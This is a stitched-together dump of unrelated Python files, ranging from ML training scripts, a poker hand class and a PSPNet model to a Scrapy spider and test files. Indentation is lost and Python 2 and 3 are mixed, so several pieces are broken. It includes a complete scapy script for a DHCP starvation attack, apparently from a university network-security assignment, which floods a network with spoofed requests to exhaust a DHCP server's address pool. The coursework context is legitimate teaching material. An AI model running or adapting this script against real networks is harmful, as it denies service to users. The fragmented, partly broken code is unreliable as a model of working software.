evaluate(y_test,y_pred,plot=args.plot)
show_most_informative_features(vectorizer,model)
#from sklearn.grid_search import GridSearchCV
alphas = np.array([1,0.1,0.01,0.001,0.0001,0])
# create and fit a ridge regression model, testing each alpha
#model = Ridge()
#grid = GridSearchCV(estimator=model, param_grid=dict(alpha=alphas))
#grid.fit(X_all,y_all)
#print(grid)
# summarize the results of the grid search
#print(grid.best_score_)
#print(grid.best_estimator_.alpha)
print >>sys.stderr,"coef_:",model.coef_
print >>sys.stderr,model
if args.out:
for i,j in zip(y_test,y_pred):
print i,j
if args.pred and not args.out:
for i,val in enumerate(y_pred):
print u"{}\t{}\t{}".format(tweetids[i],val,inputd[i])
## use +/- classifier label and stacking
# echo "TO FINISH..."
# cross=cross_validation.KFold(len(labels),n_folds=10)
# acc=[]
# plusminuslabels=np.zeros(len(data['target']))*-1
# for train_index, test_index in cross:
# X=data['data']
# y=data['target']
# X_train, X_test = X[train_index], X[test_index]
# y_train, y_test = y[train_index], y[test_index]
# y_train=[0 if x < 0 else 1 for x in y_train]
# y_test=[0 if x < 0 else 1 for x in y_test]
# print >>sys.stderr, Counter(y_train)
# classifier= LogisticRegression(class_weight={0: args.classweight})
# #classifier= LogisticRegression()
# classifier.fit(X_train,y_train)
# class_pred=classifier.predict(X_test)
# print >>sys.stderr, "accuracy for +/-: {}".format(accuracy_score(y_test,class_pred))
# plusminuslabels[test_index] = class_pred
# print plusminuslabels
# print len(plusminuslabels)
# y_train=[0 if x < 0 else 1 for x in data['target']]
# print Counter(plusminuslabels)
# print >>sys.stderr, "accuracy for +/-: {}".format(accuracy_score(y_train,plusminuslabels))
## create pandas object
#dat=pd.DataFrame(data=plusminuslabels,columns=["pm"])
#plusminusdict=dat.T.to_dict().values() #transpose! (to not have indices as keys)
#print plusminusdict
#plusmins=DictVectorizer(plusminusdict)
##### add plusminus as additional feature
#vectorizer=FeatureUnion([("pm",plusmins),("w",vectorizerWord)])
#data['data'] = vectorizer.fit_transform(inputd)
def evaluate(y_gold,y_pred,plot=False):
print >>sys.stderr, "mean absolute error", mean_absolute_error(y_gold, y_pred)
print >>sys.stderr, "MSE", mean_squared_error(y_gold, y_pred)
print >>sys.stderr, "R2", r2_score(y_gold, y_pred)
r_row, p_value = pearsonr(y_gold,y_pred)
print >>sys.stderr, "Pearsonr {}".format(r_row)
print >>sys.stderr, "Cosine", cosine_similarity(y_gold,y_pred)[0][0]
y_pred_official=[math.floor(x + 0.5) for x in y_pred]
y_gold_official=[math.floor(x + 0.5) for x in y_gold]
print >>sys.stderr, "Cosine official (rounded)", cosine_similarity(y_gold_official,y_pred_official)[0][0]
if plot:
plt.subplot(2, 1, 1)
plt.scatter(y_gold,y_pred)
plt.subplot(2, 1, 2)
plt.scatter(y_gold_official,y_pred_official)
plt.show()
def read_data_file(datafile,removeHashTags):
inputd=[]
labels=[]
tweetids=[]
for line in codecs.open(datafile,encoding="utf-8"):
id,label,text=line.strip().split("\t",2)
tweet = preproc.replace_user_tags(text)
        if removeHashTags == True:
            # the original code called the boolean flag itself; strip hashtags inline instead
            tweet = re.sub(r"#\w+", "", tweet)
labels.append(float(label))
inputd.append(tweet)
tweetids.append(id)
assert(len(inputd)==len(labels))
return tweetids,inputd, labels
def show_most_informative_features(vectorizer, clf, n=10):
feature_names = vectorizer.get_feature_names()
coefs_with_fns = sorted(zip(clf.coef_, feature_names))
top = zip(coefs_with_fns[:n], coefs_with_fns[:-(n + 1):-1])
for (coef_1, fn_1), (coef_2, fn_2) in top:
print >>sys.stderr,"\t%.4f\t%-15s\t\t%.4f\t%-15s" % (coef_1, fn_1, coef_2, fn_2)
# This list of English stop words is taken from the "Glasgow Information
# Retrieval Group". The original list can be found at
# http://ir.dcs.gla.ac.uk/resources/linguistic_utils/stop_words
ENGLISH_STOP_WORDS = frozenset([
"a", "about", "above", "across", "after", "afterwards", "again", "against",
"all", "almost", "alone", "along", "already", "also", "although", "always",
"am", "among", "amongst", "amoungst", "amount", "an", "and", "another",
"any", "anyhow", "anyone", "anything", "anyway", "anywhere", "are",
"around", "as", "at", "back", "be", "became", "because", "become",
"becomes", "becoming", "been", "before", "beforehand", "behind", "being",
"below", "beside", "besides", "between", "beyond", "bill", "both",
"bottom", "but", "by", "call", "can", "cannot", "cant", "co", "con",
"could", "couldnt", "cry", "de", "describe", "detail", "do", "done",
"down", "due", "during", "each", "eg", "eight", "either", "eleven", "else",
"elsewhere", "empty", "enough", "etc", "even", "ever", "every", "everyone",
"everything", "everywhere", "except", "few", "fifteen", "fify", "fill",
"find", "fire", "first", "five", "for", "former", "formerly", "forty",
"found", "four", "from", "front", "full", "further", "get", "give", "go",
"had", "has", "hasnt", "have", "he", "hence", "her", "here", "hereafter",
"hereby", "herein", "hereupon", "hers", "herself", "him", "himself", "his",
"how", "however", "hundred", "i", "ie", "if", "in", "inc", "indeed",
"interest", "into", "is", "it", "its", "itself", "keep", "last", "latter",
"latterly", "least", "less", "ltd", "made", "many", "may", "me",
"meanwhile", "might", "mill", "mine", "more", "moreover", "most", "mostly",
"move", "much", "must", "my", "myself", "name", "namely", "neither",
"never", "nevertheless", "next", "nine", "no", "nobody", "none", "noone",
"nor", "not", "nothing", "now", "nowhere", "of", "off", "often", "on",
"once", "one", "only", "onto", "or", "other", "others", "otherwise", "our",
"ours", "ourselves", "out", "over", "own", "part", "per", "perhaps",
"please", "put", "rather", "re", "same", "see", "seem", "seemed",
"seeming", "seems", "serious", "several", "she", "should", "show", "side",
"since", "sincere", "six", "sixty", "so", "some", "somehow", "someone",
"something", "sometime", "sometimes", "somewhere", "still", "such",
"system", "take", "ten", "than", "that", "the", "their", "them",
"themselves", "then", "thence", "there", "thereafter", "thereby",
"therefore", "therein", "thereupon", "these", "they", "thick", "thin",
"third", "this", "those", "though", "three", "through", "throughout",
"thru", "thus", "to", "together", "too", "top", "toward", "towards",
"twelve", "twenty", "two", "un", "under", "until", "up", "upon", "us",
"very", "via", "was", "we", "well", "were", "what", "whatever", "when",
"whence", "whenever", "where", "whereafter", "whereas", "whereby",
"wherein", "whereupon", "wherever", "whether", "which", "while", "whither",
"who", "whoever", "whole", "whom", "whose", "why", "will", "with",
"within", "without", "would", "yet", "you", "your", "yours", "yourself",
"yourselves"])
if __name__=="__main__":
main()
|
import threading
import time
from msg import *
def ProcessMessages():
while True:
m = Message.SendMessage(M_BROKER, M_GETDATA)
if m.Header.Type == M_DATA:
print(m.Data)
else:
time.sleep(1)
def Client():
Message.SendMessage(M_BROKER, M_INIT)
t = threading.Thread(target=ProcessMessages)
t.start()
while True:
Message.SendMessage(M_ALL, M_DATA, input())
Client()
|
"""
Python Version 3.8
Singapore Institute of Technology (SIT)
Information and Communications Technology (Information Security), BEng (Hons)
ICT-2203 Network Security Assignment 1
Author: @ Tan Zhao Yea / 1802992
Academic Year: 2020/2021
Lecturer: Woo Wing Keong
Submission Date: 25th October 2020
This script holds the code to perform DHCP Starvation.
> Port security being enabled discourages us from spoofing RandMac() as the Layer 2 source on the same host
> The Layer 2 src therefore remains the same, but the chaddr in the BOOTP payload is changed to a RandMac()
> First, send a DHCP Discover packet
> Then, send a DHCP Request packet after receiving the DHCP Offer packet
"""
import logging
import os
import time
import multiprocessing as mp
from scapy.all import *
# UDP Port Number Protocol
SERVER_DHCP_PORT = 67
CLIENT_DHCP_PORT = 68
# Default Configurations
IFACE = conf.iface
BROADCAST_MAC = 'ff:ff:ff:ff:ff:ff'
META_ADDR = "0.0.0.0"
BROADCAST_IP = "255.255.255.255"
HW = get_if_hwaddr(IFACE)
# DHPC Options
MSG_TYPE = 0
SERVER_ID = 1
DHCP_OFFER = 2
ANS = 1
# Sleep Time
SLEEP_DURATION = 2
# Logging Configuration
LOG_FILE_DIR = os.path.abspath("logs/dhcp_starve.txt")
logging.basicConfig(filename=LOG_FILE_DIR,
filemode='w',
level=logging.DEBUG,
format='%(asctime)s %(message)s',
datefmt='%d/%m/%Y %I:%M:%S %p')
class DHCPStarvation(object):
def __init__(self, iface, hardware_addr, broadcast_mac, meta_addr, broadcast_ip, random_mac):
self.iface = iface
self.broadcast_mac = broadcast_mac
self.meta_address = meta_addr
self.broadcast_ip = broadcast_ip
# Get HW Address
self.hw = hardware_addr
self.rand_mac = random_mac
def send_dhcp_dis_pkt(self):
""" Creates the DHCP Discover Packet to prepare for DHCP Starvation """
pkt = Ether(src=self.hw, dst=self.broadcast_mac) \
/ IP(src=self.meta_address, dst=self.broadcast_ip) \
/ UDP(sport=CLIENT_DHCP_PORT, dport=SERVER_DHCP_PORT) \
/ BOOTP(chaddr=self.rand_mac) \
/ DHCP(options=[('message-type', 'discover'), 'end'])
sendp(pkt, iface=self.iface, verbose=0)
def craft_dhcp_pkt():
""" Crafting DHCP Discover Packet Starvation Attack """
# Infinite Attack
while True:
logging.info("[*] Crafting DHCP Discover Packet")
random_mac = RandMAC()
packet = DHCPStarvation(iface=IFACE,
hardware_addr=HW,
broadcast_mac=BROADCAST_MAC,
meta_addr=META_ADDR,
broadcast_ip=BROADCAST_IP,
random_mac=random_mac)
logging.info("[*] Sending DHCP Discover Packet ...")
packet.send_dhcp_dis_pkt()
logging.info(f"[*] Sleeping for {SLEEP_DURATION} seconds ...")
time.sleep(SLEEP_DURATION)
def dhcp_pkt_filter(pkt):
"""
Allow only DHCP Packet for processing
:param pkt: Incoming Packet
:return: Boolean (True/False)
"""
try:
if pkt.haslayer(DHCP) and pkt[DHCP].options[MSG_TYPE][ANS] == DHCP_OFFER:
return pkt[UDP].sport == SERVER_DHCP_PORT and pkt[UDP].dport == CLIENT_DHCP_PORT
return False
except:
pass
def send_dhcp_req(pkt):
"""
Sending DHCP Request Packet
:param pkt: Incoming Offer Packet
"""
dhcp_request = Ether(src=HW, dst=pkt[Ether].src) \
/ IP(src=META_ADDR, dst=BROADCAST_IP) \
/ UDP(sport=CLIENT_DHCP_PORT, dport=SERVER_DHCP_PORT) \
/ BOOTP(chaddr=pkt[BOOTP].chaddr) \
/ DHCP(options=[('message-type', 'request'), ('server_id', pkt[DHCP].options[SERVER_ID][ANS]), ('requested_addr', pkt[BOOTP].yiaddr),'end'])
sendp(dhcp_request, iface=IFACE, verbose=0)
logging.info(f"[*] Successfully Starved Address: {pkt[BOOTP].yiaddr}")
def main():
""" Sniffer Function """
sniff(lfilter=dhcp_pkt_filter, prn=send_dhcp_req, iface=IFACE)
if __name__ == '__main__':
p1 = mp.Process(target=main)
p2 = mp.Process(target=craft_dhcp_pkt)
logging.info("[*] Starting Program ...")
p1.start()
p2.start()
|
for i in range(1,3000):
for j in range(1,11):
if i%j != 0:
break
else:
continue
num = 2520
i = 2
while i < 21:
if num%i == 0:
i += 1
else:
num += 1
i = 2
print(num)
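# A faster equivalent (a sketch): the smallest number divisible by 1..20 is just the
# least common multiple of 1..20, which math.gcd computes without a brute-force search.
import math
from functools import reduce

print(reduce(lambda a, b: a * b // math.gcd(a, b), range(1, 21)))  # 232792560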
|
# Write a Python program to find common items from two lists
def commoninList (list1,list2):
    commonEle = []
    # loop over the shorter list and collect every element that also appears in the other
    if len(list1)<len(list2):
        for i in range(len(list1)):
            if list1[i] in list2:
                commonEle.append(list1[i])
    else:
        for i in range(len(list2)):
            if list2[i] in list1:
                commonEle.append(list2[i])
    if len(commonEle) == 0:
        print('Nothing in common')
    return commonEle
list1 = [3,4,5,6,7,8]
list2 = [10]
output = commoninList(list1,list2)
print(output)
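# Alternative sketch (not in the original): for hashable items, a set intersection
# gives the same common elements, though it drops duplicates and original order.
print(list(set(list1) & set(list2)))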
|
from setuptools import setup
setup(
name='geomap6',
version='6.2.0',
packages=['ml_project', 'ml_project.src', 'ml_project.src.model', 'ml_project.src.model.utils'],
url='',
license='MIT',
author='asokolov',
author_email='aesokolov1975@gmail.com',
description='Geo tools'
)
|
"""
- contains data for a single author
"""
class author( object ):
    """Holds the data for a single author."""
    def __init__(self, line):
        """assigns default values to the object.
        INPUT: line - the raw author entry parsed from the MD file
        """
self.fname = None
self.lname = None
self.contribution = None
self.affiliation = None
self.email = None
self.ORCIDiD = None
self.corresponding_author = False
self.submitting_author = False
self.equal_contribution = False
def show( self ):
"""prints the object as a DICTIONARY
"""
from pprint import pprint as pprint
pprint( self.__dict__ )
def grab_author_data( md_path ):
"""
- grabs all the author data from the md_path
- returns a list of strings that contain all the data
"""
grab_line = False # bool to check if you should grab that particular line
author_data = []
with open( md_path, "r" ) as md_file:
for line in md_file:
if ( "^1Ω^" in line.strip() and "^2^" in line.strip() ) or line.strip() == "**Author Contributions: **":
grab_line = True
elif line.strip() == "![][1]" or line.strip() == "Please select a tag below that best describes your submission":
grab_line = False
if grab_line and len( line.strip() ) != 0:
author_data.append( line.strip() )
return( author_data )
def format_author_data( list_of_raw_author_data ):
"""
- gets the list of string of raw author data
- returns dictionary of formatted author data
"""
from pprint import pprint as pprint
# pprint( list_of_raw_author_data )
list_names = list_of_raw_author_data[0].split(", ")
affiliations = list_of_raw_author_data[ 1 : list_of_raw_author_data.index("> ^Ω^ To whom correspondence should be addressed") ]
contributions = list_of_raw_author_data[ list_of_raw_author_data.index("**Author Contributions: **")+1 :]
author_list = []
for person in list_names:
corresponding_author = False
auth = author( person )
if "Ω" in person:
auth.corresponding_author = True
if list_names.index( person ) == 0:
auth.submitting_author = True
temp = person.replace( "Ω", "" )
num = int(temp[-2])
full_name = temp[:-3]
auth.fname = " ".join(full_name.split()[:-1])
auth.lname = full_name.split()[-1]
auth.affiliation = affiliations[num-1]
auth.contribution = author.convert_contributions_to_dict(contributions)[full_name]
author_list.append( auth )
return( author_list )
def convert_contributions_to_dict( contributions ):
"""
    - converts the list of contributions to a dictionary of contributions for each author
"""
author_line = True
contribution_line = False
author_contribution = {}
temp = "---||---".join( contributions )
temp = temp.replace( "---||---- ", ";" )
associated_contributions = temp.split("---||---")
for item in associated_contributions:
temp = item.split(";")
contris = temp[1:]
list_auths = temp[0].split(", ")
for auth in list_auths:
author_contribution[auth] = contris
return( author_contribution )
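# Usage sketch (not part of the original; "submission.md" is a hypothetical path,
# and the helper functions are assumed to be reachable through the author class,
# matching the author.convert_contributions_to_dict call above).
if __name__ == "__main__":
    raw_lines = author.grab_author_data("submission.md")
    for auth in author.format_author_data(raw_lines):
        auth.show()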
|
class PokerHand:
"""
models a poker hand
"""
def __init__(self, hand_list=None):
if hand_list is None:
hand_list = []
self.__hand = hand_list
def get_hand(self):
"""
getter method for hand(list of cards)
:return: hand
"""
return self.__hand
def add_card(self, card):
"""
append a card to a hand
:param card: card being added
:return: None
"""
self.__hand.append( card )
def get_ith_card(self, index):
if 0 <= index < len( self.get_hand() ):
return self.get_hand()[index]
else:
return None
def deal_poker_hand(self, deck):
"""
this function adds 5 cards from the deck to the hand
:param deck: deck that cards are being drawn from
:return:
"""
for i in range( 5 ):
self.__hand.append( deck.deal() )
def what_is_it(self):
"""
evaluates the hand
        :return: a 3-tuple (hand_type, pairs, highcards)
            index[0] - hand type: 4 for flush, 3 for 2 pair, 2 for pair, 1 for highcard
            index[1] - pair values: [] if there are no pairs, [rank1] if 1 pair, [rank1, rank2] if 2 pairs
            index[2] - list of highcard values (all cards not in a pair)
"""
pairs = []
highcards = []
ranks = sorted( [card.get_rank() for card in self.get_hand()] )
suits = [card.get_suit() for card in self.get_hand()]
        for r in set( ranks ):
            # count each distinct rank once; only ranks appearing exactly once are high cards
            if ranks.count( r ) == 4:
                pairs.append( r )
                pairs.append( r )
            elif ranks.count( r ) == 3:
                pairs.append( r )
            elif ranks.count( r ) == 2:
                pairs.append( r )
            else:
                highcards.append( r )
if all( s == suits[0] for s in suits ):
return 4, pairs, highcards
if len( pairs ) == 2:
return 3, pairs, highcards
if len( pairs ) == 1:
return 2, pairs, highcards
else:
return 1, pairs, highcards
def compare_to(self, other_hand):
"""
Determines which of two poker hands is worth more. Returns an int
which is either positive, negative, or zero depending on the comparison.
:param self: The first hand to compare
:param other_hand: The second hand to compare
:return: a negative number if self is worth LESS than other_hand,
zero if they are worth the SAME (a tie), and a positive number if
self is worth MORE than other_hand
"""
this_hand_type = self.what_is_it()[0]
other_hand_type = other_hand.what_is_it()[0]
this_hand_pairs = sorted( self.what_is_it()[1], reverse=True )
other_hand_pairs = sorted( other_hand.what_is_it()[1], reverse=True )
this_hand_highcards = sorted( self.what_is_it()[2], reverse=True )
other_hand_highcards = sorted( other_hand.what_is_it()[2], reverse=True )
if this_hand_type > other_hand_type: # if this hand is a higher type
return 1
if this_hand_type < other_hand_type: # if this hand is a lower type
return -1
if this_hand_type == other_hand_type: # if same hand type
if len( this_hand_pairs ) != 0: # makes sure there are pairs
if self.compare_to_helper( this_hand_pairs, other_hand_pairs ) == 0: # if pairs tie
return self.compare_to_helper( this_hand_highcards,
other_hand_highcards ) # compare highcards result
else:
return self.compare_to_helper( this_hand_pairs,
other_hand_pairs ) # compare pairs result
else: # if no pairs then just compare the highcards
return self.compare_to_helper( this_hand_highcards,
other_hand_highcards ) # compare highcards result
def compare_to_helper(self, this_hand_list, other_hand_list):
"""
:param this_hand_list: sorted list of ranks from 'this' hand
:param other_hand_list: sorted list of ranks from other hand
:return: 1 if this_hand_list contains first instance of a greater rank,
-1 if other_hand_list contains first instance of a greater rank,
and 0 if all ranks are the same
"""
for rank1, rank2 in zip( this_hand_list, other_hand_list ):
if rank1 > rank2:
return 1
if rank1 < rank2:
return -1
if rank1 == rank2:
continue
return 0
def __str__(self):
"""
prints all cards in hand
:return: none
"""
string = ""
for card in self.get_hand():
string += str( card ) + "\n"
return string
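# Usage sketch (not part of the original module): it assumes a minimal _Card
# stand-in exposing get_rank()/get_suit(), standing in for whatever Card class
# the surrounding project actually defines.
if __name__ == "__main__":
    class _Card:
        def __init__(self, rank, suit):
            self._rank, self._suit = rank, suit
        def get_rank(self):
            return self._rank
        def get_suit(self):
            return self._suit

    pair_hand = PokerHand([_Card(r, s) for r, s in [(9, "H"), (9, "S"), (4, "D"), (7, "C"), (2, "H")]])
    flush_hand = PokerHand([_Card(r, "H") for r in [3, 6, 8, 11, 13]])
    print(pair_hand.what_is_it())             # e.g. (2, [9], [2, 4, 7]) -> a pair of nines
    print(flush_hand.compare_to(pair_hand))   # positive: a flush beats a pair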
|
import os
from nltk import sent_tokenize
from nltk import word_tokenize
class SentenceIterator(object):
def __init__(self, dirname):
self.dirname = dirname
def __iter__(self):
for fname in os.listdir(self.dirname):
for sent in sent_tokenize(open(os.path.join(self.dirname, fname),'r').read()):
yield word_tokenize(sent)
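# Usage sketch (not part of the original; "corpus_dir" is a hypothetical folder of
# plain-text files). Each iteration yields one sentence as a list of tokens, so the
# iterator can be streamed into anything that expects tokenised sentences.
if __name__ == "__main__":
    for tokens in SentenceIterator("corpus_dir"):
        print(tokens)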
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from base.segbase import SegBaseModel
class PSPNet(SegBaseModel):
def __init__(self, nclass, backbone='resnet50', pretrained_base=True, **kwargs):
super(PSPNet, self).__init__(nclass, backbone, pretrained_base=pretrained_base, **kwargs)
self.head = _PSPHead(nclass, **kwargs)
self.__setattr__('exclusive', ['head'])
def forward(self, x):
size = x.size()[2:]
_,_, c3, c4 = self.base_forward(x)
outputs = []
x = self.head(c4)
# upsampling to the same size as the input image
x = F.interpolate(x, size, mode='bilinear', align_corners=True)
outputs.append(x)
return tuple(outputs)
class _PSPHead(nn.Module):
def __init__(self, nclass, norm_layer=nn.BatchNorm2d, norm_kwargs=None, **kwargs):
super(_PSPHead, self).__init__()
self.psp = _PyramidPooling(2048, norm_layer=norm_layer, norm_kwargs=norm_kwargs)
self.block = nn.Sequential(
nn.Conv2d(4096, 512, 3, padding=1, bias=False),
norm_layer(512, **({} if norm_kwargs is None else norm_kwargs)),
nn.ReLU(True),
nn.Dropout(0.1),
nn.Conv2d(512, nclass, 1)
)
def forward(self, x):
x = self.psp(x)
return self.block(x)
class _PyramidPooling(nn.Module):
def __init__(self, in_channels, **kwargs):
super(_PyramidPooling, self).__init__()
out_channels = int(in_channels / 4)
self.avgpool1 = nn.AdaptiveAvgPool2d(1)
self.avgpool2 = nn.AdaptiveAvgPool2d(2)
self.avgpool3 = nn.AdaptiveAvgPool2d(3)
self.avgpool4 = nn.AdaptiveAvgPool2d(6)
self.conv1 = _PSP1x1Conv(in_channels, out_channels, **kwargs)
self.conv2 = _PSP1x1Conv(in_channels, out_channels, **kwargs)
self.conv3 = _PSP1x1Conv(in_channels, out_channels, **kwargs)
self.conv4 = _PSP1x1Conv(in_channels, out_channels, **kwargs)
def forward(self, x):
size = x.size()[2:]
feat1 = F.interpolate(self.conv1(self.avgpool1(x)), size, mode='bilinear', align_corners=True)
feat2 = F.interpolate(self.conv2(self.avgpool2(x)), size, mode='bilinear', align_corners=True)
feat3 = F.interpolate(self.conv3(self.avgpool3(x)), size, mode='bilinear', align_corners=True)
feat4 = F.interpolate(self.conv4(self.avgpool4(x)), size, mode='bilinear', align_corners=True)
return torch.cat([x, feat1, feat2, feat3, feat4], dim=1)
def _PSP1x1Conv(in_channels, out_channels, norm_layer, norm_kwargs):
return nn.Sequential(
nn.Conv2d(in_channels, out_channels, 1, bias=False),
norm_layer(out_channels, **({} if norm_kwargs is None else norm_kwargs)),
nn.ReLU(True)
)
if __name__ == "__main__":
net = PSPNet(20)
print(net)
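    # Forward-pass sketch (not in the original). Left commented out because
    # pretrained_base=True tries to download backbone weights; the model returns a
    # tuple with one tensor of shape (N, nclass, H, W) matching the input size.
    # x = torch.randn(1, 3, 480, 480)
    # print(net(x)[0].shape)  # e.g. torch.Size([1, 20, 480, 480])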
|
# -*- coding: utf-8 -*-
import scrapy
from scrapy.http import Request
class Pic169bbSpider(scrapy.Spider):
name = "pic_169bb"
allowed_domains = ["169bb.com","169ku.com"]
start_urls = ['http://169bb.com/']
def parse(self, response):
url_data = response.xpath("/html/body/div[@class='header']/div[@class='hd_nav']/div[@class='w1000']//a/@href").extract()
xiyang_url_data = url_data[4]
yield(Request(url=xiyang_url_data, callback=self.next))
    def next(self, response):
page_title_list = response.xpath("/html/body//div[@class='w1000 box03']/ul[@class='product01']//li/a/@alt").extract()
page_url_list = response.xpath("/html/body//div[@class='w1000 box03']/ul[@class='product01']//li/a/@href").extract()
page_num = response.xpath("//span[@class='pageinfo']//strong/text()").extract()
print(response.text)
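        # Possible continuation sketch (not in the original): the extracted titles
        # and links could be yielded as items or followed further, e.g.:
        # for title, url in zip(page_title_list, page_url_list):
        #     yield {"title": title, "url": url}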
|
#!/usr/bin/env python
import time, unittest, os, sys
from selenium import webdriver
from main.activity.desktop_v3.activity_login import *
from main.activity.desktop_v3.activity_talk_product import *
from main.page.desktop_v3.shop.pe_shop import *
from main.page.desktop_v3.product.pe_product import *
from main.page.desktop_v3.product.pe_talk_product import *
from utils.function.setup import *
from utils.lib.user_data import *
from random import randint
class TestInputTalk(unittest.TestCase):
talk_message = 'asdfghjklmnbvcxzwertyuii #' + ' http://cumiiii1' + str(randint(0,9999)) + '.com'
dict = {
"site" : "live",
"end_to_end" : True, #True: the default to test Talk with end-to-end process, False: For sending multiple talk
"loop" : 3, #Only used for multiple talk
"sender" : user5,
"receiver" : user6
}
def setUp(self):
self.driver = tsetup('phantomjs')
self.talk = talkProductActivity(self.driver)
self.talk.set_parameter(self.dict)
def test_input_talk(self):
print('==========================')
print('TEST: SEND TALK')
print('==========================')
self.talk.set_parameter(self.dict) #initialization
self.talk.test_input_talk(self.driver, self.dict['site'], self.talk_message)
def tearDown(self):
print("Testing akan selesai dalam beberapa saat..")
time.sleep(5)
self.driver.quit()
#test
# main
if(__name__ == "__main__"):
unittest.main()
|
#!/usr/bin/env python
#-*-coding:utf-8-*-
# @File:lr_model.py
# @Author: Michael.liu
# @Date:2020/6/17 14:51
# @Desc: this code is ....
import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import StandardScaler
import joblib  # sklearn.externals.joblib was removed in newer scikit-learn releases
class LrModel(object):
train_df = None
test_df = None
vali_df = None
model = None
def __init__(self, trainfile, testfile, valifile):
self.train_file = trainfile
self.test_file = testfile
self.vali_file = valifile
def load_train_data(self, names):
self.train_df = pd.read_csv(self.train_file, header=0, sep=',')
def load_vali_data(self, names):
self.vali_df = pd.read_csv(self.vali_file,header=0, sep=',')
def load_test_data(self, names):
self.test_df = pd.read_csv(self.test_file, header=0, sep=',')
def train(self, feature_head, target_head):
'''
:param train_df: dataframe of train data
:param vali_df: dataframe of valid data
:param test_df: dataframe of test data
:param feature_head: list of features names for model
:param target_head: str of target name for model
:return:
'''
#print(self.train_df)
#print(feature_head)
x_train = self.train_df[feature_head]
y_train = self.train_df[target_head]
        # The validation set is not used here for now
        # TODO: the train/validation split could be randomised
# x_vali = vali_df[feature_head]
# y_vali = vali_df[target_head]
x_test = self.test_df[feature_head]
y_test = self.test_df[target_head]
lr = LogisticRegression()
lr.fit(x_train, y_train)
print('Accuracy of LR Classifier:%f' % lr.score(x_test, y_test))
joblib.dump(lr, 'gen_lr.pkl')
self.model = lr
# 加载模型并进行预测
def infer(self, feature_head, target_head, model_path=None):
'''
:param feature_head: list names of features for model
:param target_head: string name of target for model
:param model_path : model path for loading model (model must have same feature head and target head with valid data)
:return:
'''
if model_path != None:
self.model = joblib.load(model_path)
x_vali = self.vali_df[feature_head]
y_vali = self.vali_df[target_head]
print('Accuracy of LR Classifier:%f' % self.model.score(x_vali, y_vali))
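# Usage sketch (not part of the original; the file names and column names below
# are hypothetical placeholders for the project's real CSV data).
if __name__ == "__main__":
    feature_cols = ["feature_1", "feature_2", "feature_3"]
    target_col = "label"
    lr_model = LrModel("train.csv", "test.csv", "vali.csv")
    lr_model.load_train_data(feature_cols)
    lr_model.load_test_data(feature_cols)
    lr_model.load_vali_data(feature_cols)
    lr_model.train(feature_cols, target_col)   # also dumps gen_lr.pkl
    lr_model.infer(feature_cols, target_col)   # reuse the in-memory model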
|
#!/usr/bin/python -tt
#
# Marko Saukko <marko.saukko@cybercom.com>
#
# Copyright (C) 2011 Nokia Corporation and/or its subsidiary(-ies).
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from pykickstart.commands.partition import *
class MeeGo_PartData(FC4_PartData):
removedKeywords = FC4_PartData.removedKeywords
removedAttrs = FC4_PartData.removedAttrs
def __init__(self, *args, **kwargs):
FC4_PartData.__init__(self, *args, **kwargs)
self.deleteRemovedAttrs()
self.align = kwargs.get("align", None)
def _getArgsAsStr(self):
retval = FC4_PartData._getArgsAsStr(self)
        if self.align:
            retval += " --align=%d" % self.align
return retval
class MeeGo_Partition(FC4_Partition):
removedKeywords = FC4_Partition.removedKeywords
removedAttrs = FC4_Partition.removedAttrs
def _getParser(self):
op = FC4_Partition._getParser(self)
        # The alignment value is given in kBytes. e.g., value 8 means that
        # the partition is aligned to start on an 8192-byte boundary.
op.add_option("--align", type="int", action="store", dest="align",
default=None)
return op
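# Example sketch (not from the original): since --align above is parsed as an
# integer number of kBytes, a kickstart partition line could look like
#   part /boot --size=32 --align=8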
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.util.contextutil import temporary_dir
from pants_test.pants_run_integration_test import PantsRunIntegrationTest
class CleanAllTest(PantsRunIntegrationTest):
def test_clean_all_on_wrong_dir(self):
with temporary_dir() as workdir:
self.assert_failure(self.run_pants_with_workdir(["clean-all"], workdir))
|